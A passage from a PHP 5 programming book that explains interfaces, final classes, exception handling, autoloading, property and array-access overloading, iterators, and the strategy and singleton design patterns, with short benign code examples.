        protected $x, $y;
    }

    class Square extends Shape {
        function draw()
        {
            // Here goes the code which draws the Square
            ...
        }
    }

    class Circle extends Shape {
        function draw()
        {
            // Here goes the code which draws the Circle
            ...
        }
    }

You can see that the draw() abstract method does not contain any code.

Note: Unlike some other languages, you cannot define an abstract method with a default implementation. In PHP, a method is either abstract (without code) or it’s fully defined.

3.13 INTERFACES

Class inheritance enables you to describe a parent-child relationship between classes. For example, you might have a base class Shape from which both Square and Circle derive. However, you might often want to add additional “interfaces” to classes, basically meaning additional contracts to which the class must adhere. This is achieved in C++ by using multiple inheritance and deriving from two classes. PHP chose interfaces as an alternative to multiple inheritance, which allows you to specify additional contracts a class must follow. An interface is declared similar to a class but only includes function prototypes (without implementation) and constants. Any class that “implements” this interface automatically has the interface’s constants defined and, as the implementing class, needs to supply the function definitions for the interface’s function prototypes that are all abstract methods (unless you declare the implementing class as abstract).

To implement an interface, use the following syntax:

    class A implements B, C, ... {
        ...
    }
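The rules above can be combined in one short sketch. All names here (HasArea, HasName, NamedShape, Tile, and the UNIT constant) are hypothetical and chosen only for illustration. The abstract class implements an interface without defining its method, which is allowed because the class is declared abstract; the concrete class supplies the missing definitions and implements a second interface.

```php
<?php
// Hypothetical interfaces and classes; not taken from the chapter.
interface HasArea {
    function area();
}

interface HasName {
    const UNIT = "cm";
    function name();
}

// Abstract, so it may leave name() from HasName unimplemented.
abstract class NamedShape implements HasName {
    function describe()
    {
        // Calls the implementation supplied by the concrete child class.
        return $this->name() . " shape";
    }
}

class Tile extends NamedShape implements HasArea {
    private $side;

    function __construct($side)
    {
        $this->side = $side;
    }

    function name()
    {
        return "Tile";
    }

    function area()
    {
        return $this->side * $this->side;
    }
}

$tile = new Tile(3);
print $tile->describe() . ", area " . $tile->area() . " " . Tile::UNIT . "^2\n";
```

Note that the interface constant UNIT is available through the implementing class as Tile::UNIT, and that new NamedShape() would not be allowed because the class is abstract.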

Classes that implement an interface have an instanceof (is-a) relationship with the interface; for example, if class A implements interface myInterface, the following results in '$obj is-A myInterface' printing:

    $obj = new A();
    if ($obj instanceof myInterface) {
        print '$obj is-A myInterface';
    }

The following example defines an interface called Loggable, which classes can implement to define what information will be logged by the MyLog() function. Objects of classes that don’t implement this interface and are passed to the MyLog() function result in an error message being printed:

    interface Loggable {
        function logString();
    }

    class Person implements Loggable {
        private $name, $address, $idNumber, $age;

        function logString()
        {
            return "class Person: name = $this->name, ID = $this->idNumber\n";
        }
    }

    class Product implements Loggable {
        private $name, $price, $expiryDate;

        function logString()
        {
            return "class Product: name = $this->name, price = $this->price\n";
        }
    }

    function MyLog($obj)
    {
        if ($obj instanceof Loggable) {
            print $obj->logString();
        } else {
            print "Error: Object doesn’t support Loggable interface\n";
        }
    }

    $person = new Person();
    // ...
    $product = new Product();

    MyLog($person);
    MyLog($product);

Note: Interfaces are always considered to be public; therefore, you can’t specify access modifiers for the method prototypes in the interface’s declaration.

Note: You may not implement multiple interfaces that clash with each other (for example, interfaces that define the same constants or methods).

3.14 INHERITANCE OF INTERFACES

Interfaces may inherit from other interfaces. The syntax is similar to that of classes, but allows multiple inheritance:

    interface I1 extends I2, I3, ... {
        ...
    }

Similar to when classes implement interfaces, an interface can only extend other interfaces if they don’t clash with each other (which means that you receive an error if I2 defines methods or constants already defined by I1).

3.15 final METHODS

Until now, you have seen that when you extend a class (or inherit from a class), you may override inherited methods with a new implementation. However, there are times where you might want to make sure that a method cannot be re-implemented in its derived classes. For this purpose, PHP supports the Java-like final access modifier for methods that declares the method as the final version, which can’t be overridden.

The following example is not a valid PHP script because it is trying to override a final method:

    class MyBaseClass {
        final function idGenerator()
        {
            return $this->id++;
        }

        protected $id = 0;
    }

    class MyConcreteClass extends MyBaseClass {
        function idGenerator()
        {
            return $this->id += 2;
        }
    }

This script won’t work because defining idGenerator() as final in MyBaseClass disallows the deriving classes from overriding it and changing the behavior of the id generation logic.

3.16 final CLASSES

Similar to final methods, you can also define a class as final. Doing so disallows inheriting from this class. The following code does not work:

    final class MyBaseClass {
        ...
    }

    class MyConcreteClass extends MyBaseClass {
        ...
    }

MyBaseClass has been declared as final; MyConcreteClass may not extend it and, therefore, execution of the script fails.

3.17 __toString() METHOD

Consider the following code:

    class Person {
        function __construct($name)
        {
            $this->name = $name;
        }

        private $name;
    }

    $obj = new Person("Andi Gutmans");
    print $obj;

It prints the following:

    Object id #1

Unlike most other data types, printing the object’s id will usually not be interesting to you. Also, objects often refer to data that should have print semantics; for example, it might make sense that when you print an object of a class representing a person, the person’s information would be printed out.

For this purpose, PHP enables you to implement a function called __toString(), which should return the string representation of the object, and when defined, the print command will call it and print the returned string.

By using __toString(), the previous example can be modified to its more useful form:

    class Person {
        function __construct($name)
        {
            $this->name = $name;
        }

        function __toString()
        {
            return $this->name;
        }

        private $name;
    }

    $obj = new Person("Andi Gutmans");
    print $obj;

It prints the following:

    Andi Gutmans

The __toString() method is currently only called by the print and echo language constructs. In the future, it will probably also be called by common string operations, such as string concatenation and explicit casting to string.

3.18 EXCEPTION HANDLING

Exception handling tends to be one of the more problematic aspects in software development. Not only is it hard for the developer to decide what to do when an error occurs (such as database failure, network failure, or a software bug), but it is hard to spot all the places in the code to insert checks for failure and to call the correct function to handle it. An even more complicated task is that after you handle the failure, how do you fix your program’s flow to continue at a certain point in your program?

Today, most modern languages support some variant of the popular try/catch/throw exception-handling paradigm. try/catch is an enclosing language construct that protects its enclosing source code and basically tells the language, “I’m handling exceptions that occur in this code.” Exceptions or errors

are “thrown” when they are detected and the language run time searches its call stack to see if there is a relevant try/catch construct that is willing to handle the exception.

There are many advantages to this method. To begin with, you don’t have to place if() statements in every place where an exception might occur; thus, you end up writing a lot less code. Instead, you can enclose the entire section of code with a try/catch construct and handle an error if one occurs. Also, after you detect an error using the throw statement, you can easily return to a point in the code that is responsible for handling and continuing execution of the program, because throw unwinds the function call-stack until it detects an appropriate try/catch block.

The syntax of try/catch is as follows:

    try {
        ... // Code which might throw an exception
    } catch (FirstExceptionClass $exception) {
        ... // Code which handles this exception
    } catch (SecondExceptionClass $exception) {

    }

The try {} construct encloses the code that can throw an exception, which is followed by a series of catch statements, each declaring what exception class it handles and under what variable name the exception should be accessible inside the catch block.

When an exception is thrown, the first catch() is reached and an instanceof comparison with the declared class is performed. If the result is true, the catch block is entered and the exception is made available under the declared variable name. If the result is false, the next catch statement is checked. Once a catch statement is entered, the following catch statements will not be entered, even if the instanceof check would result in true. If no catch statements are relevant, the language engine checks for additional enclosing try/catch statements in the same function. When none exist, it continues searching by unwinding the call stack to the calling functions.

The throw statement

    throw <object>;

can only throw an object. You can’t throw any basic types such as strings or integers. A pre-defined exception class exists called Exception, from which all your exception classes must inherit. Trying to throw an object which does not inherit from class Exception will result in a fatal runtime error.

The following code snippet shows the interface of this built-in exception class (the square brackets in the constructor declaration are used to represent optional parameters, which are not valid PHP syntax):

    class Exception {
        function __construct([$message [,$code]]);

        final public getMessage();
        final public getCode();
        final public getFile();
        final public getLine();
        final public getTrace();
        final public getTraceAsString();

        protected $message;
        protected $code;
        protected $file;
        protected $line;
    }

The following is a full-blown example of exception handling:

    class NullHandleException extends Exception {
        function __construct($message)
        {
            parent::__construct($message);
        }
    }

    function printObject($obj)
    {
        if ($obj == NULL) {
            throw new NullHandleException("printObject received NULL object");
        }
        print $obj . "\n";
    }

    class MyName {
        function __construct($name)
        {
            $this->name = $name;
        }

        function __toString()
        {
            return $this->name;
        }

        private $name;
    }

    try {
        printObject(new MyName("Bill"));
        printObject(NULL);
        printObject(new MyName("Jane"));
    } catch (NullHandleException $exception) {
        print $exception->getMessage();
        print " in file " . $exception->getFile();
        print " on line " . $exception->getLine() . "\n";
    } catch (Exception $exception) {
        // This won't be reached
    }

Running this script prints

    Bill
    printObject received NULL object in file C:\projects\php5\tests\test.php on line 12

Notice that the name Jane isn’t printed, only Bill. This is because the printObject(NULL) line throws an exception inside the function, and therefore, Jane is skipped. In the catch handler, inherited methods such as getFile() are used to give additional information on where the exception occurred.

Tip: You might have noticed that the constructor of NullHandleException calls its parent constructor. If NullHandleException’s constructor is left out, by default, new calls the parent constructor. However, it is good practice to add a constructor and call the parent constructor explicitly so that you don’t forget to do so if you suddenly decide to add a constructor of your own.

Today, most internal methods don’t throw exceptions to keep backward compatibility with PHP 4. This somewhat limits the use of exceptions, but it does allow your own code to use them. Some new extensions in PHP 5 (mainly the object-oriented ones) do throw exceptions. Make sure you check the extension’s documentation to be sure.

Tip: When using exceptions, follow these basic rules (both for performance and code-manageability reasons):

1. Remember that exceptions are exceptions. You should only use them to handle problems, which brings us to the next rule...

2. Never use exceptions for flow control. This makes the code hard to follow (similar to the goto statement found in some languages) and is slow.

3. The exception should only contain the error information and shouldn’t contain parameters (or additional information) that affect flow control and logic inside the catch handler.
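The order in which catch statements are checked, and the unwinding of the call stack from the throwing function to the enclosing try block, can be sketched as follows. The exception classes ConfigException and MissingKeyException and the two functions are hypothetical names introduced only for this illustration.

```php
<?php
// Hypothetical exception hierarchy; not taken from the chapter.
class ConfigException extends Exception {
}

class MissingKeyException extends ConfigException {
}

function readSetting($settings, $key)
{
    if (!array_key_exists($key, $settings)) {
        // Thrown here, caught one level up in describeSetting().
        throw new MissingKeyException("Missing setting: $key");
    }
    return $settings[$key];
}

function describeSetting($settings, $key)
{
    try {
        return readSetting($settings, $key);
    } catch (MissingKeyException $e) {
        // The most specific class is listed first, so this block is entered.
        return "default (" . $e->getMessage() . ")";
    } catch (ConfigException $e) {
        // Skipped for a MissingKeyException, even though an instanceof
        // check against ConfigException would also be true.
        return "config error";
    }
}

print describeSetting(array("host" => "localhost"), "host") . "\n";
print describeSetting(array(), "port") . "\n";
```

Had the two catch statements been listed in the opposite order, the ConfigException block would have been entered first, because a MissingKeyException is also a ConfigException.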
3.19 __autoload()

When writing object-oriented code, it is customary to put each class in its own source file. The advantage of this is that it’s much easier to find where a class is placed, and it also minimizes the amount of code that needs to be included because you only include exactly the classes you need. The downside is that you often have to include tons and tons of source files, which can be a pain, often leading to including too many files and a code-maintenance headache. __autoload() solves this problem by not requiring you to include classes you are about to use. If an __autoload() function is defined (only one such function can exist per application) and you access a class that hasn’t been defined, it will be called with the class name as a parameter. This gives you a chance to include the class just in time. If you successfully include the class, your source code continues executing as if the class had been defined. If you don’t successfully include the class, the scripting engine raises a fatal error about the class not existing.

Here’s a typical example using __autoload():

MyClass.php:

<?php
class MyClass {
    function printHelloWorld()
    {
        print "Hello, World\n";
    }
}
?>

general.inc:

<?php
function __autoload($class_name)
{
    require_once($_SERVER["DOCUMENT_ROOT"] . "/classes/$class_name.php");
}
?>

main.php:

<?php
require_once "general.inc";

$obj = new MyClass();
$obj->printHelloWorld();
?>

Note: This example doesn’t omit the PHP open and close tags (unlike other examples shown in Chapter 2), because it is spread across more than one file and thus is not a code snippet.

So long as MyClass.php exists in the classes/ directory inside the document root of the web server, the script prints

Hello, World

Realize that MyClass.php was not explicitly included in main.php but implicitly by the call to __autoload(). You will usually keep the definition of __autoload() in a file that is included by all of your main script files (similar to general.inc in this example), and when the number of classes you use increases, the savings in code and maintenance will be great.

Note: Although classes in PHP are case-insensitive, case is preserved when sending the class name to __autoload(). If you prefer your classes’ file names to be case-sensitive, make sure you are consistent in your code, and always use the correct case for your classes. If you prefer not to do so, you can use the strtolower() function to lowercase the class name before trying to include it, and save the classes under lowercased file names.

3.20 Class Type Hints in Function Parameters

Although PHP is not a strictly typed language in which you would need to declare what type your variables are, it does allow you (if you wish) to specify the class you are expecting in your function’s or method’s parameters.

Here’s the code of a typical PHP function, which accepts one function parameter and first checks if it belongs to the class it requires:

function onlyWantMyClassObjects($obj)
{
    if (!($obj instanceof MyClass)) {
        die("Only objects of type MyClass can be sent to this function");
    }
    ...
}

Writing code that verifies the object’s type in each relevant function can be a lot of work. To save you time, PHP enables you to specify the class of the parameter in front of the parameter itself.

Following is the same example using class type hints:

function onlyWantMyClassObjects(MyClass $obj)
{
    // ...
}

When the function is called, PHP automatically performs an instanceof check before the function’s code starts executing. If it fails, it will abort with an error. Because the check is an instanceof check, it is legal to send any object that satisfies the is-a relationship with the class type. This feature is mainly useful during development, because it helps ensure that you aren’t passing objects to functions which weren’t designed to handle them.

3.21 Summary

This chapter covered the PHP 5 object model, including the concept of classes and objects, polymorphism, and other important object-oriented concepts and semantics. If you’re new to PHP but have written code in object-oriented languages, you will probably not understand how people managed to write object-oriented code until now. If you’ve written object-oriented code in PHP 4, you were probably just dying for these new features.
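To make the class type hints of Section 3.20 concrete, here is a small sketch with hypothetical Shape and Circle classes (not taken from the text). It shows that a subclass satisfies the hint through the is-a relationship, while an unrelated object is rejected before the function body runs. It assumes PHP 7 or later, where the failed check surfaces as a catchable TypeError.

```php
<?php
// Hypothetical classes for this sketch.
class Shape {
    function name()
    {
        return "shape";
    }
}

class Circle extends Shape {
    function name()
    {
        return "circle";
    }
}

// The class type hint makes PHP check the argument before the body runs.
function describeShape(Shape $shape)
{
    return "Got a " . $shape->name();
}

// A Circle is-a Shape, so it satisfies the hint.
print describeShape(new Circle()) . "\n";

// An unrelated object does not. Assumption: PHP 7 or later, where the
// failed check is reported as a TypeError that can be caught.
$rejected = false;
try {
    describeShape(new stdClass());
} catch (TypeError $e) {
    $rejected = true;
}
print ($rejected ? "stdClass was rejected" : "stdClass was accepted") . "\n";
```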


CHAPTER 4

PHP 5 Advanced OOP and Design Patterns

“I made up the term ‘object-oriented,’ and I can tell you I didn’t have C++ in mind.”
Alan Kay, OOPSLA ’97

4.1 Introduction

In this chapter, you learn how to use PHP’s more advanced object-oriented capabilities. When you finish reading this chapter, you will have learned

☞ Overloading capabilities that can be controlled from PHP code
☞ Using design patterns with PHP 5
☞ The new reflection API

4.2 Overloading Capabilities

In PHP 5, extensions written in C can overload almost every aspect of the object syntax. It also allows PHP code to overload a limited subset that is most often needed. This section covers the overloading abilities that you can control from your PHP code.

4.2.1 Property and Method Overloading

PHP allows overloading of property access and method calls by implementing special proxy methods that are invoked if the relevant property or method doesn’t exist. This gives you a lot of flexibility in intercepting these actions and defining your own functionality.

You may implement the following method prototypes:

function __get($property)
function __set($property, $value)
function __call($method, $args)

__get is passed the property’s name, and you should return a value.
__set is passed the property’s name and its new value.
__call is passed the method’s name and a numerically indexed array of the passed arguments starting from 0 for the first argument.

The following example shows how to use the __get and __set functions (array_key_exists() is covered later in this book; it checks whether a key exists in the specified array):

class StrictCoordinateClass {
    private $arr = array('x' => NULL, 'y' => NULL);

    function __get($property)
    {
        if (array_key_exists($property, $this->arr)) {
            return $this->arr[$property];
        } else {
            print "Error: Can't read a property other than x & y\n";
        }
    }

    function __set($property, $value)
    {
        if (array_key_exists($property, $this->arr)) {
            $this->arr[$property] = $value;
        } else {
            print "Error: Can't write a property other than x & y\n";
        }
    }
}

$obj = new StrictCoordinateClass();

$obj->x = 1;
print $obj->x;

print "\n";

$obj->n = 2;
print $obj->n;

The output is

1
Error: Can't write a property other than x & y
Error: Can't read a property other than x & y

As x exists in the object’s array, the setter and getter method handlers both agree to read/write the values. However, when accessing the property n, both for reading and writing, array_key_exists() returns false and, therefore, the error messages are reached.
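One possible variation, sketched here under the assumption that you would rather fail loudly than print a message, is to throw an exception from the handlers. The class name StrictPoint is hypothetical; the structure otherwise mirrors StrictCoordinateClass.

```php
<?php
// Hypothetical variation on StrictCoordinateClass: unknown properties
// raise an exception instead of printing a message.
class StrictPoint {
    private $arr = array('x' => NULL, 'y' => NULL);

    function __get($property)
    {
        if (!array_key_exists($property, $this->arr)) {
            throw new Exception("Can't read property '$property'");
        }
        return $this->arr[$property];
    }

    function __set($property, $value)
    {
        if (!array_key_exists($property, $this->arr)) {
            throw new Exception("Can't write property '$property'");
        }
        $this->arr[$property] = $value;
    }
}

$point = new StrictPoint();
$point->x = 1;          // handled by __set()
print $point->x . "\n"; // handled by __get()

$message = "";
try {
    $point->n = 2;      // not one of x or y, so __set() throws
} catch (Exception $e) {
    $message = $e->getMessage();
}
print $message . "\n";
```

With this approach the caller decides how to report the problem, which keeps output concerns out of the class itself.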

__call() can be used for a variety of purposes. The following example shows how to create a delegation model, in which an instance of the class HelloWorldDelegator delegates all method calls to an instance of the HelloWorld class:

class HelloWorld {
    function display($count)
    {
        for ($i = 0; $i < $count; $i++) {
            print "Hello, World\n";
        }
        return $count;
    }
}

class HelloWorldDelegator {
    function __construct()
    {
        $this->obj = new HelloWorld();
    }

    function __call($method, $args)
    {
        return call_user_func_array(array($this->obj, $method), $args);
    }

    private $obj;
}

$obj = new HelloWorldDelegator();
print $obj->display(3);

This script’s output is

Hello, World
Hello, World
Hello, World
3

The call_user_func_array() function allows __call() to relay the function call with its arguments to HelloWorld::display(), which prints out "Hello, World\n" three times. It then returns $count (in this case, 3), which is then printed out. Not only can you relay the method call to a different object (or handle it in whatever way you want), but you can also return a value from __call(), just like a regular method.
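The delegation idea can be extended in a few lines. The sketch below uses hypothetical Greeter and GreeterProxy classes; it records which methods were relayed and, as one possible design choice, refuses methods the target does not offer by throwing SPL's BadMethodCallException.

```php
<?php
// Hypothetical target class.
class Greeter {
    function greet($name)
    {
        return "Hello, $name";
    }
}

// Hypothetical proxy that forwards calls and records which methods were used.
class GreeterProxy {
    private $target;
    private $calls = array();

    function __construct($target)
    {
        $this->target = $target;
    }

    function __call($method, $args)
    {
        // Refuse methods the target does not offer.
        if (!method_exists($this->target, $method)) {
            throw new BadMethodCallException("No such method: $method");
        }
        $this->calls[] = $method;
        return call_user_func_array(array($this->target, $method), $args);
    }

    function getCalls()
    {
        return $this->calls;
    }
}

$proxy = new GreeterProxy(new Greeter());
print $proxy->greet("World") . "\n";

$error = "";
try {
    $proxy->wave();   // Greeter has no wave() method
} catch (BadMethodCallException $e) {
    $error = $e->getMessage();
}
print $error . "\n";
```

Note that getCalls() is a real method on the proxy, so it is called directly and never passes through __call().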

4.2.2 Overloading the Array Access Syntax

It is common to have key/value mappings or, in other words, lookup dictionaries in your application framework. For this purpose, PHP supports associative arrays that map either integer or string values to any other PHP value. This feature was covered in Chapter 2, “PHP 5 Basic Language,” and in case you forgot about it, here’s an example that looks up the user John’s social-security number using an associative array which holds this information:

print "John's ID number is " . $userMap["John"];

Associative arrays are extremely convenient when you have all the information at hand. But consider a government office that has millions of people in its database; it just wouldn’t make sense to load the entire database into the $userMap associative array just to look up one user. A possible alternative is to write a method that will look up the user’s ID number via a database call. The previous code would look something like the following:

print "John's ID number is " . $db->FindIDNumber("John");

This example would work well, but many developers prefer the associative array syntax to access key/value-like dictionaries. For this purpose, PHP 5 enables you to overload an object so that it can behave like an array. Basically, it would enable you to use the array syntax, but behind the scenes, a method written by you would be called, which would execute the relevant database call, returning the wanted value.

It is really a matter of personal preference as to what method to use. Sometimes, it is nicer to use this overloading ability than the verbosity of calling a method, and it’s up to you to decide which method suits you best.

To allow your class to overload the array syntax, it needs to implement the ArrayAccess interface (see Figure 4.1).

Fig. 4.1 ArrayAccess interface.
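As a rough, runnable illustration of the four methods the ArrayAccess interface requires (offsetExists(), offsetGet(), offsetSet(), and offsetUnset()), the sketch below backs them with a plain in-memory array. The class name ArrayBackedMap and the ID value are placeholders invented for this sketch. The attribute lines are an assumption about running on newer PHP versions and are not part of the PHP 5 interface.

```php
<?php
// Hypothetical in-memory stand-in for a database-backed lookup.
class ArrayBackedMap implements ArrayAccess {
    private $data = array();

    // The attribute lines below keep PHP 8.1+ from reporting a
    // return-type deprecation; older versions read them as comments.
    #[\ReturnTypeWillChange]
    function offsetExists($name)
    {
        return isset($this->data[$name]);
    }

    #[\ReturnTypeWillChange]
    function offsetGet($name)
    {
        return isset($this->data[$name]) ? $this->data[$name] : NULL;
    }

    #[\ReturnTypeWillChange]
    function offsetSet($name, $value)
    {
        $this->data[$name] = $value;
    }

    #[\ReturnTypeWillChange]
    function offsetUnset($name)
    {
        unset($this->data[$name]);
    }
}

$map = new ArrayBackedMap();
$map["John"] = "000-00-0000";                       // offsetSet(), placeholder value
print $map["John"] . "\n";                          // offsetGet()
print (isset($map["Jane"]) ? "yes" : "no") . "\n";  // offsetExists()
unset($map["John"]);                                // offsetUnset()
print (isset($map["John"]) ? "yes" : "no") . "\n";
```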

The following example shows how to use the ArrayAccess interface. It is incomplete because the database methods themselves aren’t implemented:

class UserToSocialSecurity implements ArrayAccess {
    private $db; // An object which includes database access methods

    function offsetExists($name)
    {
        return $this->db->userExists($name);
    }

    function offsetGet($name)
    {
        return $this->db->getUserId($name);
    }

    function offsetSet($name, $id)
    {
        $this->db->setUserId($name, $id);
    }

    function offsetUnset($name)
    {
        $this->db->removeUser($name);
    }
}

$userMap = new UserToSocialSecurity();

print "John's ID number is " . $userMap["John"];

You can see that the $userMap object is used just like an array, but behind the scenes, when the $userMap["John"] lookup is performed, the offsetGet() method is invoked, which in turn calls the database getUserId() method.

4.3 Iterators

The properties of an object can be iterated using the foreach() loop:

class MyClass {
    public $name = "John";
    public $sex = "male";
}

$obj = new MyClass();

foreach ($obj as $key => $value) {
    print "obj[$key] = $value\n";
}

Running this script results in

obj[name] = John
obj[sex] = male

However, often when you write object-oriented code, your classes don’t necessarily represent a simple key/value array as in the previous example, but represent more complex data, such as a database query or a configuration file.

PHP 5 allows you to overload the behavior of the foreach() iteration from within your code so you can have it do what makes sense in respect to your class’s design.

Note: Not only does PHP 5 enable you to overload this behavior, but it also allows extension authors to override such behavior, which has brought iterator support to various PHP extensions such as SimpleXML and SQLite.

To overload iteration for your class kind, you need to adhere to certain interfaces that are pre-defined by the language (see Figure 4.2).

Fig. 4.2 Class diagram of Iterator hierarchy (interface Traversable, interface Iterator, interface IteratorAggregate).

Any class that implements the Traversable interface is a class that can be traversed using the foreach() construct. However, Traversable is an empty interface that shouldn’t be implemented directly; instead, you should implement either Iterator or IteratorAggregate, which inherit from Traversable.

The main interface is Iterator. It defines the methods you need to implement to give your classes the foreach() iteration capabilities. These methods should be public and are listed in the following table.

Interface Iterator

void rewind()      Rewinds the iterator to the beginning of the list (this might not always be possible to implement).
mixed current()    Returns the value of the current position.
mixed key()        Returns the key of the current position.
void next()        Moves the iterator to the next key/value pair.
bool valid()       Returns true/false if there are more values (used before the call to current() or key()).

If your class implements the Iterator interface, it will be traversable with foreach(). Here’s a simple example:

class NumberSquared implements Iterator {
    public function __construct($start, $end)
    {
        $this->start = $start;
        $this->end = $end;
    }

    public function rewind()
    {
        $this->cur = $this->start;
    }

    public function key()
    {
        return $this->cur;
    }

    public function current()
    {
        return pow($this->cur, 2);
    }

    public function next()
    {
        $this->cur++;
    }

    public function valid()
    {
        return $this->cur <= $this->end;
    }

    private $start, $end;
    private $cur;
}

$obj = new NumberSquared(3, 7);

foreach ($obj as $key => $value) {
    print "The square of $key is $value\n";
}

The output is

The square of 3 is 9
The square of 4 is 16
The square of 5 is 25
The square of 6 is 36
The square of 7 is 49

This example demonstrates how you can implement your own behavior for iterating a class. In this case, the class represents the squares of integers, and after being given a minimum and maximum value, iterating over those values will give you the number itself and its square.

Now in many cases, your class itself will represent data and have methods to interact with this data. The fact that it also requires an iterator might not be its main functionality. Also, when iterating an object, the state of the iteration (current position) is usually stored in the object itself, thus not allowing for nested iterations. For these two reasons, you may separate the implementation of your class and its iterator by making your class implement the IteratorAggregate interface. Instead of having to define all the previous methods, you need to define a method that returns an object of a different class, which implements the iteration scheme for your class.

The public method you need to implement is Iterator getIterator(), which returns an iterator object that handles the iteration for this class.

By using this method of separating between the class and its iterator, we can rewrite the previous example the following way:

class NumberSquared implements IteratorAggregate {
    public function __construct($start, $end)
    {
        $this->start = $start;
        $this->end = $end;
    }

    public function getIterator()
    {
        return new NumberSquaredIterator($this);
    }

    public function getStart()
    {
        return $this->start;
    }

    public function getEnd()
    {
        return $this->end;
    }

    private $start, $end;
}

class NumberSquaredIterator implements Iterator {
    function __construct($obj)
    {
        $this->obj = $obj;
    }

    public function rewind()
    {
        $this->cur = $this->obj->getStart();
    }

    public function key()
    {
        return $this->cur;
    }

    public function current()
    {
        return pow($this->cur, 2);
    }

    public function next()
    {
        $this->cur++;
    }

    public function valid()
    {
        return $this->cur <= $this->obj->getEnd();
    }

    private $cur;
    private $obj;
}

$obj = new NumberSquared(3, 7);

foreach ($obj as $key => $value) {
    print "The square of $key is $value\n";
}

The output is the same as the previous example. You can clearly see that the IteratorAggregate interface enables you to separate your classes’ main functionality and the methods needed for iterating it into two independent entities.

Choose whatever method suits the problem at hand. It really depends on the class and its functionality as to whether the iterator should be in a separate class.

4.4 Design Patterns

So, what exactly qualifies a language as being object-oriented (OO)? Some people believe that any language that has objects that encapsulate data and methods can be considered OO. Others would also include polymorphism via inheritance and access modifiers into the definition. The purists would probably list dozens of pages of things they think an OO language must support, such as exceptions, method overloading, reflection, strict typing, and more. You can bet that none of these people would ever agree with each other because of the diversity of OOP languages, each of them good for certain tasks and not quite as good for others.

However, what most people would agree with is that developing OO software is not only about the syntax and the language features but it is a state of mind. Although there are some professionally written programs in procedural languages such as C (for example, PHP itself), people developing in OO languages tend to give the software design more of an emphasis. One reason might be the fact that OO languages tend to contain features that help in the design phase, but the main reason is probably cultural because the OO community has always put a lot of emphasis on good design.
This chapter covers some of the more advanced OO techniques that are possible with PHP, including the implementation of some common design patterns that are easily adapted to PHP.

When designing software, certain programming problems repeat themselves. Some of these have been addressed by the software design community and have been given accepted general solutions. These solutions to repeating problems are called design patterns. The advantage of knowing and using these patterns is not only to save time instead of reinventing the wheel, but also to give developers a common language in software design. You’ll often hear software developers say, “Let’s use a singleton pattern for this,” or “Let’s use a factory pattern for that.” Due to the importance of these patterns in today’s software development, this section covers some of these patterns.

4.4.1 Strategy Pattern

The strategy pattern is typically used when your program’s algorithm should be interchangeable with different variations of the algorithm. For example, if you have code that creates an image, under certain circumstances, you might want to create JPEGs and under other circumstances, you might want to create GIF files.

The strategy pattern is usually implemented by declaring an abstract base class with an algorithm method, which is then implemented by inheriting concrete classes. At some point in the code, it is decided what concrete strategy is relevant; it would then be instantiated and used wherever relevant.

Our example shows how a download server can use a different file selection strategy according to the web client accessing it. When creating the HTML with the download links, it will create download links to either .tar.gz files or .zip files according to the browser’s OS identification. Of course, this means that files need to be available in both formats on the server. For simplicity’s sake, assume that if the word “Win” exists in $_SERVER["HTTP_USER_AGENT"], we are dealing with a Windows system and want to create .zip links; otherwise, we are dealing with systems that prefer .tar.gz.

In this example, we would have two strategies: the .tar.gz strategy and the .zip strategy, which is reflected as the following strategy hierarchy (see Figure 4.3).

Fig. 4.3 Strategy hierarchy (abstract class FileNamingStrategy; class ZipFileNamingStrategy; class TarGzFileNamingStrategy).

The following code snippet should give you an idea of how to use such a strategy pattern:

abstract class FileNamingStrategy {
    abstract function createLinkName($filename);
}

class ZipFileNamingStrategy extends FileNamingStrategy {
    function createLinkName($filename)
    {
        return "http://downloads.foo.bar/$filename.zip";
    }
}

class TarGzFileNamingStrategy extends FileNamingStrategy {
    function createLinkName($filename)
    {
        return "http://downloads.foo.bar/$filename.tar.gz";
    }
}

if (strstr($_SERVER["HTTP_USER_AGENT"], "Win")) {
    $fileNamingObj = new ZipFileNamingStrategy();
} else {
    $fileNamingObj = new TarGzFileNamingStrategy();
}

$calc_filename = $fileNamingObj->createLinkName("Calc101");
$stat_filename = $fileNamingObj->createLinkName("Stat2000");

print <<<EOF
<h1>The following is a list of great downloads</h1>
<br>
<a href="$calc_filename">A great calculator</a><br>
<a href="$stat_filename">The best statistics application</a><br>
<br>
EOF;

Accessing this script from a Windows system gives you the following HTML output:

<h1>The following is a list of great downloads</h1>
<br>
<a href="http://downloads.foo.bar/Calc101.zip">A great calculator</a><br>
<a href="http://downloads.foo.bar/Stat2000.zip">The best statistics application</a><br>
<br>
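Because the snippet above reads $_SERVER["HTTP_USER_AGENT"], it is awkward to try outside a web server. The following sketch repeats the same hierarchy and moves the selection into a hypothetical helper, chooseFileNamingStrategy(), that takes the user-agent string as a parameter. The helper name and the sample user-agent strings are illustrative assumptions, not part of the original example.

```php
<?php
// Same hierarchy as in the text, repeated so the sketch is self-contained.
abstract class FileNamingStrategy {
    abstract function createLinkName($filename);
}

class ZipFileNamingStrategy extends FileNamingStrategy {
    function createLinkName($filename)
    {
        return "http://downloads.foo.bar/$filename.zip";
    }
}

class TarGzFileNamingStrategy extends FileNamingStrategy {
    function createLinkName($filename)
    {
        return "http://downloads.foo.bar/$filename.tar.gz";
    }
}

// Hypothetical helper: picks the strategy from a user-agent string that is
// passed in, rather than read from $_SERVER.
function chooseFileNamingStrategy($userAgent)
{
    if (strpos($userAgent, "Win") !== false) {
        return new ZipFileNamingStrategy();
    }
    return new TarGzFileNamingStrategy();
}

// Sample user-agent strings (illustrative only).
$agents = array(
    "Mozilla/5.0 (Windows NT 10.0)",
    "Mozilla/5.0 (X11; Linux x86_64)",
);

foreach ($agents as $agent) {
    $strategy = chooseFileNamingStrategy($agent);
    print $strategy->createLinkName("Calc101") . "\n";
}
```

The calling code only ever talks to FileNamingStrategy, so adding a third archive format would mean one new subclass and one new branch in the helper.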

Tip: The strategy pattern is often used with the factory pattern, which is described later in this section. The factory pattern selects the correct strategy.

4.4.2 Singleton Pattern

The singleton pattern is probably one of the best-known design patterns. You have probably encountered many situations where you have an object that handles some centralized operation in your application, such as a logger object. In such cases, it is usually preferred for only one such application-wide instance to exist and for all application code to have the ability to access it. Specifically, in a logger object, you would want every place in the application that wants to print something to the log to have access to it, and let the centralized logging mechanism handle the filtering of log messages according to log level settings. For this kind of situation, the singleton pattern exists.

Making your class a singleton class is usually done by implementing a static class method getInstance(), which returns the only single instance of the class. The first time you call this method, it creates an instance, saves it in a private static variable, and returns you the instance. The subsequent times, it just returns you a handle to the already created instance.

Here’s an example:

class Logger {
    static function getInstance()
    {
        if (self::$instance == NULL) {
            self::$instance = new Logger();
        }
        return self::$instance;
    }

